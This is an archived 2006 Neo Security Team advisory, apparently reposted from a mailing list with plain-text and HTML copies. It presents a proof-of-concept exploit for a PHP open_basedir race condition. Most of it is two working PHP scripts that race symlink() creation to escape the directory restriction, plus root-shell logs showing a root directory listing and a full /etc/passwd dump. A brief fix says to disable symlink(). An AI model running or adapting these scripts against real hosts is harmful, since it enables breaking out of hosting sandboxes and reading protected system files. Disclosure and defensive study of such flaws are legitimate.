Home / exploitsPDF  

nst-php-openbasedir.txt

Posted on 10 October 2006

------=_Part_140466_2216477.1160381991193 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline /* -------------------------------------------------------- [N]eo [S]ecurity [T]eam [NST] - Advisory #26 - 09/10/06 -------------------------------------------------------- Program: PHP Homepage: http://www.php.net Vulnerable Versions: PHP 3, 4, 5 Risk: High! Impact: Critical Risk -==PHP open_basedir with symlink() function Race Condition PoC exploit==- --------------------------------------------------------- - Description --------------------------------------------------------- PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. - Tested --------------------------------------------------------- localhost - PHP 5.0.4 - Vulnerability Description --------------------------------------------------------- The vulnerability was discovered by the staff of Hardened-PHP ( www.hardened-php.net). You can see the original advisory in http://www.hardened-php.net/advisory_082006.132.html. The point isn't all like the Hardened people said: "The first script alternates a symbolic link between a file that is allowed and the one that is forbidden by open_basedir and the second script simply puts loops around operations trying to operate on the symbolic link." We don't need to alternate the symlink beetwen an allowed file an a forbidden one. In this PoC you can see that the symlink doesn't point to an allowed file in the loop. script1.php <? symlink("a/a/a/a/a/a/", "dummy"); symlink("dummy/../../../../../../", "xxx"); unlink("dummy"); while (1) { symlink(".", "dummy"); unlink("dummy"); } ?> script2.php <? @print_r(scandir("/")); // open_basedir restriction doesn't let us to see the root dir content // scandir() is a PHP 5 function. You can use another function of the other versions to work on the directory while (1) { $dir=@scandir("xxx"); if (@count($dir) > 20) print_r($dir); // the main dir have more than 20 folders } ?> --Real Proof of Concept exploit-- [root@fc43035 race_condition]# php script1.php & [1] 7942 PHP Warning: Module 'gd' already loaded in Unknown on line 0 [root@fc43035 race_condition]# php script2.php PHP Warning: Module 'gd' already loaded in Unknown on line 0 PHP Warning: file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 2 Warning: file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 2 PHP Warning: file_get_contents(/etc/passwd): failed to open stream: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2 Warning: file_get_contents(/etc/passwd): failed to open stream: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2 PHP Warning: scandir(): open_basedir restriction in effect. File(/) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 3 Warning: scandir(): open_basedir restriction in effect. File(/) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 3 PHP Warning: scandir(/): failed to open dir: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 3 Warning: scandir(/): failed to open dir: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 3 PHP Warning: scandir(): (errno 1): Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 3 Warning: scandir(): (errno 1): Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 3 Array ( [0] => . [1] => .. [2] => .autofsck [3] => .autorelabel [4] => bin [5] => boot [6] => chroot [7] => dev [8] => etc [9] => home [10] => lib [11] => lib64 [12] => lost+found [13] => media [14] => misc [15] => mnt [16] => net [17] => opt [18] => proc [19] => root [20] => sbin [21] => selinux [22] => srv [23] => sys [24] => tmp [25] => usr [26] => var ) Array ( [0] => . [1] => .. [2] => .autofsck [3] => .autorelabel [4] => bin [5] => boot [6] => chroot [7] => dev [8] => etc [9] => home [10] => lib [11] => lib64 [12] => lost+found [13] => media [14] => misc [15] => mnt [16] => net [17] => opt [18] => proc [19] => root [20] => sbin [21] => selinux [22] => srv [23] => sys [24] => tmp [25] => usr [26] => var ) [root@fc43035 race_condition]# --Real Proof of Concept exploit-- We finally bypass the open_basedir restriction and we read the main dir content. Also we can read a file, like /etc/passwd. In the third line of script1.php we make the symbolic link to ./etc/passwd so we have to create a folder named "etc" with a file named "passwd" inside: [root@fc43035 race_condition]# ls a etc script1.php script2.php script.php [root@fc43035 race_condition]# cd etc [root@fc43035 etc]# ls passwd [root@fc43035 etc]# cd .. [root@fc43035 race_condition]# Then the script1.php is equal than the first one. We have just to change the symbolic link to "dummy/../../../../../../etc/passwd". In the script2.php we try to read the file ("xxx" link) with the file_get_contents() function. script1.php <? symlink("a/a/a/a/a/a/", "dummy"); symlink("dummy/../../../../../../etc/passwd", "xxx"); unlink("dummy"); while (1) { symlink(".", "dummy"); unlink("dummy"); } ?> script2.php <? while (1) { print @file_get_contents("xxx"); } ?> --Real Proof of Concept exploit-- [root@fc43035 race_condition]# php script1.php & [1] 9979 PHP Warning: Module 'gd' already loaded in Unknown on line 0 [root@fc43035 race_condition]# php script2.php PHP Warning: Module 'gd' already loaded in Unknown on line 0 PHP Warning: file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 2 Warning: file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 2 PHP Warning: file_get_contents(/etc/passwd): failed to open stream: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2 Warning: file_get_contents(/etc/passwd): failed to open stream: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin apache:x:48:48:Apache:/var/wwww/htdocs:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin ftp:x:22222:0:root:/root:/bin/false cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin apache:x:48:48:Apache:/var/wwww/htdocs:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin ftp:x:22222:0:root:/root:/bin/false cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash --Real Proof of Concept exploit-- You can see that the /etc/passwd is readed two times and a lot more if we don't stop the script execution. - How to fix it? More information? -------------------------------------------------------- Like the Hardened-PHP staff said, you have to disallow the use of symlink() function. You can do this using the disable_functions directive in your php configuration (php.ini by default): disable_functions = ...,symlink; - References -------------------------------------------------------- http://www.neosecurityteam.net/index.php?action=advisories&id=26 http://www.hardened-php.net/advisory_082006.132.html - Credits -------------------------------------------------------- Proof of Concept exploit by Paisterist -> paisterist.nst [at] gmail [dot] com Vulnerability discovered by Hardened-PHP staff (http://www.hardened-php.net) [N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/ - Greets -------------------------------------------------------- HaCkZaTaN K4P0 Daemon21 Link 0m3gA_x LINUX nitrous m0rpheus nikyt0x KingMetal Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!! @@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@ '@@@@@''@@'@@@''''''''@@''@@@''@@ '@@'@@@@@@''@@@@@@ @@@'''''@@@ '@@'''@@@@'''''''''@@@''''@@@ @@@@''''@@'@@@@@@@@@@''''@@@@@ /* EOF */ ------=_Part_140466_2216477.1160381991193 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline /*<br>--------------------------------------------------------<br>[N]eo [S]ecurity [T]eam [NST] - Advisory #26 - 09/10/06<br>--------------------------------------------------------<br>Program: PHP<br>Homepage: <a href="http://www.php.net"> http://www.php.net</a><br>Vulnerable Versions: PHP 3, 4, 5<br>Risk: High!<br>Impact: Critical Risk<br><br>-==PHP open_basedir with symlink() function Race Condition PoC exploit==-<br>--------------------------------------------------------- <br><br>- Description<br>---------------------------------------------------------<br>PHP&nbsp; is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. <br> <br>- Tested<br>---------------------------------------------------------<br>localhost - PHP 5.0.4<br><br>- Vulnerability Description<br>---------------------------------------------------------<br><br>The vulnerability was discovered by the staff of Hardened-PHP ( <a href="http://www.hardened-php.net">www.hardened-php.net</a>). You can see the original advisory<br>in <a href="http://www.hardened-php.net/advisory_082006.132.html">http://www.hardened-php.net/advisory_082006.132.html</a> .<br><br>The point isn't all like the Hardened people said:<br><br>&quot;The first script alternates a symbolic link between a file that<br>is allowed and the one that is forbidden by open_basedir and the<br>second script simply puts loops around operations trying to <br>operate on the symbolic link.&quot;<br><br>We don't need to alternate the symlink beetwen an allowed file an a forbidden one. In this PoC you can see that the symlink <br>doesn't point to an allowed file in the loop.<br> <br>script1.php<br>&lt;?<br>&nbsp;&nbsp; symlink(&quot;a/a/a/a/a/a/&quot;, &quot;dummy&quot;);<br>&nbsp;&nbsp; symlink(&quot;dummy/../../../../../../&quot;, &quot;xxx&quot;);<br>&nbsp;&nbsp; unlink(&quot;dummy&quot;);<br>&nbsp;&nbsp; while (1) {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; symlink(&quot;.&quot;, &quot;dummy&quot;); <br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; unlink(&quot;dummy&quot;);<br>&nbsp;&nbsp; }<br>?&gt;<br><br>script2.php<br>&lt;?<br>@print_r(scandir(&quot;/&quot;)); // open_basedir restriction doesn't let us to see the root dir content<br>// scandir() is a PHP 5 function. You can use another function of the other versions to work on the directory <br>while (1) {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $dir=@scandir(&quot;xxx&quot;);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if (@count($dir) &gt; 20) print_r($dir); // the main dir have more than 20 folders<br>}<br>?&gt;<br><br>--Real Proof of Concept exploit--<br>[root@fc43035 race_condition]# php script1.php &amp;<br>[1] 7942<br>PHP Warning:&nbsp; Module 'gd' already loaded in Unknown on line 0<br>[root@fc43035 race_condition]# php script2.php<br>PHP Warning:&nbsp; Module 'gd' already loaded in Unknown on line 0 <br>PHP Warning:&nbsp; file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 2<br><br>Warning: file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 2 <br>PHP Warning:&nbsp; file_get_contents(/etc/passwd): failed to open stream: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2<br><br>Warning: file_get_contents(/etc/passwd): failed to open stream: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2 <br>PHP Warning:&nbsp; scandir(): open_basedir restriction in effect. File(/) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 3<br><br>Warning: scandir(): open_basedir restriction in effect. File(/) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 3 <br>PHP Warning:&nbsp; scandir(/): failed to open dir: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 3<br><br>Warning: scandir(/): failed to open dir: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 3 <br>PHP Warning:&nbsp; scandir(): (errno 1): Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 3<br><br>Warning: scandir(): (errno 1): Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 3 <br>Array<br>(<br>&nbsp;&nbsp;&nbsp; [0] =&gt; .<br>&nbsp;&nbsp;&nbsp; [1] =&gt; ..<br>&nbsp;&nbsp;&nbsp; [2] =&gt; .autofsck<br>&nbsp;&nbsp;&nbsp; [3] =&gt; .autorelabel<br>&nbsp;&nbsp;&nbsp; [4] =&gt; bin<br>&nbsp;&nbsp;&nbsp; [5] =&gt; boot<br>&nbsp;&nbsp;&nbsp; [6] =&gt; chroot<br>&nbsp;&nbsp;&nbsp; [7] =&gt; dev<br>&nbsp;&nbsp;&nbsp; [8] =&gt; etc<br> &nbsp;&nbsp;&nbsp; [9] =&gt; home<br>&nbsp;&nbsp;&nbsp; [10] =&gt; lib<br>&nbsp;&nbsp;&nbsp; [11] =&gt; lib64<br>&nbsp;&nbsp;&nbsp; [12] =&gt; lost+found<br>&nbsp;&nbsp;&nbsp; [13] =&gt; media<br>&nbsp;&nbsp;&nbsp; [14] =&gt; misc<br>&nbsp;&nbsp;&nbsp; [15] =&gt; mnt<br>&nbsp;&nbsp;&nbsp; [16] =&gt; net<br>&nbsp;&nbsp;&nbsp; [17] =&gt; opt<br>&nbsp;&nbsp;&nbsp; [18] =&gt; proc <br>&nbsp;&nbsp;&nbsp; [19] =&gt; root<br>&nbsp;&nbsp;&nbsp; [20] =&gt; sbin<br>&nbsp;&nbsp;&nbsp; [21] =&gt; selinux<br>&nbsp;&nbsp;&nbsp; [22] =&gt; srv<br>&nbsp;&nbsp;&nbsp; [23] =&gt; sys<br>&nbsp;&nbsp;&nbsp; [24] =&gt; tmp<br>&nbsp;&nbsp;&nbsp; [25] =&gt; usr<br>&nbsp;&nbsp;&nbsp; [26] =&gt; var<br>)<br>Array<br>(<br>&nbsp;&nbsp;&nbsp; [0] =&gt; .<br> &nbsp;&nbsp;&nbsp; [1] =&gt; ..<br>&nbsp;&nbsp;&nbsp; [2] =&gt; .autofsck<br>&nbsp;&nbsp;&nbsp; [3] =&gt; .autorelabel<br>&nbsp;&nbsp;&nbsp; [4] =&gt; bin<br>&nbsp;&nbsp;&nbsp; [5] =&gt; boot<br>&nbsp;&nbsp;&nbsp; [6] =&gt; chroot<br>&nbsp;&nbsp;&nbsp; [7] =&gt; dev<br>&nbsp;&nbsp;&nbsp; [8] =&gt; etc<br>&nbsp;&nbsp;&nbsp; [9] =&gt; home<br>&nbsp;&nbsp;&nbsp; [10] =&gt; lib <br>&nbsp;&nbsp;&nbsp; [11] =&gt; lib64<br>&nbsp;&nbsp;&nbsp; [12] =&gt; lost+found<br>&nbsp;&nbsp;&nbsp; [13] =&gt; media<br>&nbsp;&nbsp;&nbsp; [14] =&gt; misc<br>&nbsp;&nbsp;&nbsp; [15] =&gt; mnt<br>&nbsp;&nbsp;&nbsp; [16] =&gt; net<br>&nbsp;&nbsp;&nbsp; [17] =&gt; opt<br>&nbsp;&nbsp;&nbsp; [18] =&gt; proc<br>&nbsp;&nbsp;&nbsp; [19] =&gt; root<br>&nbsp;&nbsp;&nbsp; [20] =&gt; sbin <br>&nbsp;&nbsp;&nbsp; [21] =&gt; selinux<br>&nbsp;&nbsp;&nbsp; [22] =&gt; srv<br>&nbsp;&nbsp;&nbsp; [23] =&gt; sys<br>&nbsp;&nbsp;&nbsp; [24] =&gt; tmp<br>&nbsp;&nbsp;&nbsp; [25] =&gt; usr<br>&nbsp;&nbsp;&nbsp; [26] =&gt; var<br>)<br><br>[root@fc43035 race_condition]#<br>--Real Proof of Concept exploit--<br><br> We finally bypass the open_basedir restriction and we read the main dir content. Also we can read a file, like /etc/passwd.<br><br>In the third line of script1.php we make the symbolic link to ./etc/passwd so we have to create a folder named &quot;etc&quot; with a <br>file named &quot;passwd&quot; inside:<br><br>[root@fc43035 race_condition]# ls<br>a&nbsp; etc&nbsp; script1.php&nbsp; script2.php&nbsp; script.php<br>[root@fc43035 race_condition]# cd etc<br>[root@fc43035 etc]# ls<br>passwd<br>[root@fc43035 etc]# cd ..<br>[root@fc43035 race_condition]#<br><br>Then the script1.php is equal than the first one. We have just to change the symbolic link to &quot;dummy/../../../../../../etc/passwd&quot;.<br>In the script2.php we try to read the file (&quot;xxx&quot; link) with the file_get_contents() function. <br><br>script1.php<br>&lt;?<br>&nbsp;&nbsp; symlink(&quot;a/a/a/a/a/a/&quot;, &quot;dummy&quot;);<br>&nbsp;&nbsp; symlink(&quot;dummy/../../../../../../etc/passwd&quot;, &quot;xxx&quot;);<br>&nbsp;&nbsp; unlink(&quot;dummy&quot;);<br>&nbsp;&nbsp; while (1) {<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; symlink(&quot;.&quot;, &quot;dummy&quot;);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; unlink(&quot;dummy&quot;);<br>&nbsp;&nbsp; }<br>?&gt;<br><br>script2.php<br>&lt;?<br>while (1) {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print @file_get_contents(&quot;xxx&quot;);<br>}<br>?&gt;<br><br> --Real Proof of Concept exploit--<br>[root@fc43035 race_condition]# php script1.php &amp;<br>[1] 9979<br>PHP Warning:&nbsp; Module 'gd' already loaded in Unknown on line 0<br>[root@fc43035 race_condition]# php script2.php<br>PHP Warning:&nbsp; Module 'gd' already loaded in Unknown on line 0 <br>PHP Warning:&nbsp; file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 2<br><br>Warning: file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php on line 2 <br>PHP Warning:&nbsp; file_get_contents(/etc/passwd): failed to open stream: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2<br><br>Warning: file_get_contents(/etc/passwd): failed to open stream: Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2 <br><br>root:x:0:0:root:/root:/bin/bash<br>bin:x:1:1:bin:/bin:/sbin/nologin<br>daemon:x:2:2:daemon:/sbin:/sbin/nologin<br>adm:x:3:4:adm:/var/adm:/sbin/nologin<br>lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin<br>sync:x:5:0:sync:/sbin:/bin/sync <br>shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown<br>halt:x:7:0:halt:/sbin:/sbin/halt<br>mail:x:8:12:mail:/var/spool/mail:/sbin/nologin<br>news:x:9:13:news:/etc/news:<br>uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin<br>operator:x:11:0:operator:/root:/sbin/nologin <br>games:x:12:100:games:/usr/games:/sbin/nologin<br>gopher:x:13:30:gopher:/var/gopher:/sbin/nologin<br>nobody:x:99:99:Nobody:/:/sbin/nologin<br>dbus:x:81:81:System message bus:/:/sbin/nologin<br>vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin <br>rpm:x:37:37::/var/lib/rpm:/sbin/nologin<br>haldaemon:x:68:68:HAL daemon:/:/sbin/nologin<br>pcap:x:77:77::/var/arpwatch:/sbin/nologin<br>nscd:x:28:28:NSCD Daemon:/:/sbin/nologin<br>named:x:25:25:Named:/var/named:/sbin/nologin <br>netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash<br>sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin<br>rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin<br>mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin <br>smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin<br>rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin<br>nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin<br>apache:x:48:48:Apache:/var/wwww/htdocs:/sbin/nologin <br>xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin<br>dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin<br>mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash<br>amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash <br>postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash<br>ntp:x:38:38::/etc/ntp:/sbin/nologin<br>ftp:x:22222:0:root:/root:/bin/false<br>cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash<br>root:x:0:0:root:/root:/bin/bash <br>bin:x:1:1:bin:/bin:/sbin/nologin<br>daemon:x:2:2:daemon:/sbin:/sbin/nologin<br>adm:x:3:4:adm:/var/adm:/sbin/nologin<br>lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin<br>sync:x:5:0:sync:/sbin:/bin/sync<br>shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown <br>halt:x:7:0:halt:/sbin:/sbin/halt<br>mail:x:8:12:mail:/var/spool/mail:/sbin/nologin<br>news:x:9:13:news:/etc/news:<br>uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin<br>operator:x:11:0:operator:/root:/sbin/nologin<br>games:x:12:100:games:/usr/games:/sbin/nologin <br>gopher:x:13:30:gopher:/var/gopher:/sbin/nologin<br>nobody:x:99:99:Nobody:/:/sbin/nologin<br>dbus:x:81:81:System message bus:/:/sbin/nologin<br>vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin<br>rpm:x:37:37::/var/lib/rpm:/sbin/nologin <br>haldaemon:x:68:68:HAL daemon:/:/sbin/nologin<br>pcap:x:77:77::/var/arpwatch:/sbin/nologin<br>nscd:x:28:28:NSCD Daemon:/:/sbin/nologin<br>named:x:25:25:Named:/var/named:/sbin/nologin<br>netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash <br>sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin<br>rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin<br>mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin<br>smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin <br>rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin<br>nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin<br>apache:x:48:48:Apache:/var/wwww/htdocs:/sbin/nologin<br>xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin <br>dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin<br>mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash<br>amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash<br>postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash <br>ntp:x:38:38::/etc/ntp:/sbin/nologin<br>ftp:x:22222:0:root:/root:/bin/false<br>cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash<br><br>--Real Proof of Concept exploit--<br><br>You can see that the /etc/passwd is readed two times and a lot more if we don't stop the script execution. <br><br>- How to fix it? More information?<br>--------------------------------------------------------<br>Like the Hardened-PHP staff said, you have to disallow the use of symlink() function.<br>You can do this using the disable_functions directive in your php configuration ( php.ini by default):<br><br>disable_functions = ...,symlink;<br><br>- References<br>--------------------------------------------------------<br><a href="http://www.neosecurityteam.net/index.php?action=advisories&amp;id=26"> http://www.neosecurityteam.net/index.php?action=advisories&amp;id=26</a><br><a href="http://www.hardened-php.net/advisory_082006.132.html">http://www.hardened-php.net/advisory_082006.132.html</a><br><br>- Credits<br>-------------------------------------------------------- <br>Proof of Concept exploit by Paisterist -&gt; paisterist.nst [at] gmail [dot] com<br>Vulnerability discovered by Hardened-PHP staff (<a href="http://www.hardened-php.net">http://www.hardened-php.net</a>)<br><br>[N]eo [S]ecurity [T]eam [NST] - <a href="http://www.neosecurityteam.net/">http://www.neosecurityteam.net/</a><br><br><br>- Greets<br>--------------------------------------------------------<br>HaCkZaTaN<br>K4P0<br>Daemon21<br>Link<br>0m3gA_x<br>LINUX<br> nitrous<br>m0rpheus<br>nikyt0x<br>KingMetal<br><br>Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!!<br><br>@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@<br>'@@@@@''@@'@@@''''''''@@''@@@''@@<br>'@@'@@@@@@''@@@@@@ @@@'''''@@@<br>'@@'''@@@@'''''''''@@@''''@@@ <br>@@@@''''@@'@@@@@@@@@@''''@@@@@<br><br>/* EOF */<br> ------=_Part_140466_2216477.1160381991193--

 

TOP